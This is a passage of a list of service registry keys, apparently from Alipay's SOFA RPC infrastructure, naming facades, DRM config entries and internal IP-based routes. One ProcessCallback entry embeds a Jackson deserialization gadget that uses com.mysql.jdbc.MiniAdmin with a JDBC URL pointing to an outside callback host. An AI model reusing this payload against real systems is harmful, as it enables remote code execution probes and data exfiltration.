TANCE_ID#@#SOFA","com.alipay.codprod.common.service.facade.logistics.facade.LogisticsBillQueryFacade:1.0:codprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iliquidity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:accorder.product.preauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_MOBILESPCTU#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.reservecenter.facade.api.ReceiptRecognizeTaskRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradeapcore.service.api.TradeCompensateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordercore:name=com.alipay.ordercore.mrch.flood.control.keyBizPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.153.225#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secuinfos.common.service.facade.api.OptionalArticleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.mydds.biz.shared.decision.drm.LogProducerResource.slsLocation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecashier.senior.service.facade.MobilecashierOrderFacade:1.0:accorderexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pccontractprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accrmcore.common.service.facade.CRMBusinessTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accustomerweb.common.service.facade.ProjectManagerFacade:1.0:antchain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.deliverToFrontConsumeGiftGrayPercentage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.65.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.30.204.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.porder.common.service.api.contract.ContractOperateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_DATA_USER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lifemng:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:miniselfop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloantrade.common.portal.api.lend.LendContractConsultStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.integration.cif.CifClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:custview@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.disableSchemeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.PlatformAppAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.template.DetectItem:1.0:clockSensitiveInfoDetectItem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dss.endpoint.rest.facade.ConfigRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.financemng.common.facade.service.AstAllocInstElementManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfinlease.common.service.facade.cust.api.RepayPlanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:preAuditService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.b2c.activity.facade.MerchantActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.200.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerTairCache.shadowHAValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cloudbox.cloudbox_ds.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbprod.common.service.facade.trade.service.TransactionOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransSettleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.discount.common.service.facade.CampQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clive.common.service.facade.api.ServicePointService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-F-MOBILEPM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insmobile:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassettrade.fintradespi.spi.FinTradeCheckSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.alipayrel.api.AlipayRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.10.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.withdraw.api.AdvanceSettleAckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.commonfund.api.CftransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.facade.api.AppSubscribeUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.96.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintradeguard.common.service.facade.money.TransferInstructionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.spi.service.MobileSearchSpiService:1.0:apshopcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscs.common.service.facade.policy.UnifyPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.PayChannelApiManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.monitor.MonitorRuleFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:customscenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.comment.ServiceCommentConfigFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscsalipay.common.service.facade.credit.AgdsSellerCreditFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcms.common.service.facade.MediaAuditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.common.security.dresource.SecurityCommonDrm.totalUrlDecodeTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.jvcore.common.facade.portfolio.facade.FundInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.UserManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductStatisticsStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:accorderexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:finslip@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.SubmitLoanApply.corePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditmarket.service.PcreditMarketUserFlagQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.ShareholderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.client.MidasClientStabilityDRMControl.patternBizBrand,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vouchercore.facade.api.voucher.VoucherPaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitcore.common.manage.facade.api.BenefitCategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdmp.facade.PcdmpDaliyCutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradecsa.common.service.facade.wufu.WufuPrizeStubFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianFlushPeriod,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ideploy.common.service.facade.resource.BizLineFetcherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.capability.common.facade.CapabilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.inclusionconf.facade.service.common.ExceptionDefFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","zpdcore@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_PAYCOREPROD_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditmarket.service.PcreditRepayHelperFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientLineageDRM.keySize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insserviceprod.facade.InsSerInfoExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrepaycenter.common.service.facade.RepayFileDownloadOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.SettleRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.165.249#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifeprod.common.service.facade.api.crowd.LifeCrowdFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yebplus.YebPlusContractQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.chatresource.drm.ChatResourceDRM.chatTabFlowName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ficcbffweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imhomehk.common.service.facade.api.merchantservice.MerchantIndustryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.PlatformManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:[\"com.mysql.jdbc.MiniAdmin\",\"jdbc:mysql://MzMwMjQ4NjktdW5pcXVlSWQtMTA0MDAyMDA0.jackjson.noble.log.lynnshare.cc\"]@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCARDCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.govbizcenter.service.facade.accufund.QueryTicketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iacctrans.service.facade.api.AccountInfoQueryCrossRegionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.domain.RuleDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fundRecommend-disable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.diag.common.service.facade.RuleRunnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.ValueAddComponentSpmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.serverlesscore.endpoint.dds.rpc.service.SofaGwRpcService3:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:yanconfig#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:investtrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","csrobotmng@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_DRILLCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.common.manage.facade.DeliverSourceMangerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:dcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.biz.service.gw.antsearch.api.AntSearchStatisticsManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","io.sofastack.cafe.workflowx.sofarpc.facade.WorkflowxRPCInvocationFacade:1.0:SERVERLESS_PLAN_WF_ZAPPINFO@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.45.253#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.intimateprod.common.service.facade.spi.task.TaskExecuteCBFacade:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.FrontendGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilerc.common.service.facade.insightanalysis.CubeAnalysisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:checkruleexec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.acauditcenter.facade.OperationTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:acmangkhut@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.CacheRefreshManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.fundapply.config.impl.FundApplyExecConfigDRMResource.retrySceneFundOrderId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.manualOrderGenerate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.25.201.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_INTCLCN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.oceanbase.obcustomercore.common.service.facade.UCKernelServiceAccountManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.imdop.common.service.facade.HeatMapService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlequery.common.service.facade.dback.api.DbackSlipQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.OperatorRelAccountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.equity.EquityConsultRzoneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.activity.ActivityNewbieUserQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.signup.ClvSignupStatisticsQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dayuarkbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:top.navyran.sofaboot.codebase.rpc.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paymentmng.service.facade.paycore.PmtAssertCfgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","idpatrol@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finconsumeprod.facade.transorder.api.ComTransOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.alsc.reservation.ReservationRecordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorcenter.common.service.account.facade.AdvisorAccountExperimentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auth_center.common.service.facade.v2.service.TenantAwareAuthService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amldata.biz.service.impl.supergw.ApiProcessor:1.0:sdGreylistProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.46.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.icontrol.common.service.facade.api.ChannelDispatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:exemptintCallBackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlementprod.common.service.facade.api.CommissionDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:agdswindspeed@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insclaiminvestcore.common.service.facade.service.gray.GrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.portal.PortalRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.channelrouter.management.facade.RuleFastConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.recon.ReconResultQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.activity.facade.kmdk.KmdkQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cardbin:name=com.alipay.cardbin.timingsync.timestep.timelong,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.commandcenter.commandcenterDataSource_OB_gc.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.177.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.service.facade.service.spi.ExecuteService:1.0:scsupport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.facade.item.api.ItemConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_DATABIZ#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cfpcenter:name=com.alipay.zcache.log.cfpcenter.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:neithtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:hb_product_order_renewed_handler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dasbi.daas.api.task.AdameFluctuationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tbf.model.service.IPluginService:1.0:seekersintegration@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:qaZQueue46:twolevel#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bpaas.spi.common.service.facade.runtime.IndustrygwMessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.extension.BundleExtensionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecsa.common.service.facade.ShopQrCodeService:1.0:mobilecsa_shopQrCode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointprod.common.util.resource.AsyncOperationResource.stringIsChargeRefundAsync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.33.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:cloudbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bis.common.service.facade.usable.BisUsableService:1.0:bis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commandcenter.service.facade.api.LabFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.enterprisesteward.quota.EnterpriseStewardQuotaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ALIPAYMEMBER#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_REQUIREMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.216.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileha.core.service.exceptionana.ClientBasicMetadataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recruitcore.facade.api.content.ContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.amy.service.facade.GiftBizExtServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.datamng.api.AdfDataProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.loadtest.LoadTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.customscenter:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.emc.common.service.facade.api.EmergencyAdjustFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthclaimmng.common.facade.InsDataProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spannermng.common.service.facade.callback.BatchTrafficSwitchCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.finbatch.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundmng.service.facade.FundTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.122.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoitem.common.service.facade.api.ItemPurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finmatchcore:name=com.alipay.finmatchcore.common.service.facade.client.drm.MatchConfigClientDrm.flowControlConfigMapStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.Arch:name=com.alipay.securitydata.common.service.velocity.opssla.VelocityHotKeyPubConfigResource.pubVelocityHotKey,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xxePayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@mobilechat#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.delayTransDealWishId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.membercenterTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zpublish.common.service.facade.CallbackServiceFacade:1.0:gotonemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.NoticeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:fundselling@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openaccess.common.quickaccess.facade.service.proxy.platform.QuickaccessPlatformService:1.0:${system_name}@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_OPENAPI#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.213.167#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.aladdin.common.service.facade.DefaultSearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.RedPacketQrcodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:signStandardContractHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csoperationmng.service.facade.api.WarningInfoQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.null:name=com.antcloud.ifcidentitycloudus.biz.nac.drm.NacConfigDrmServiceImpl.mockSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.ZoneIdcRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dataphin.schedule.op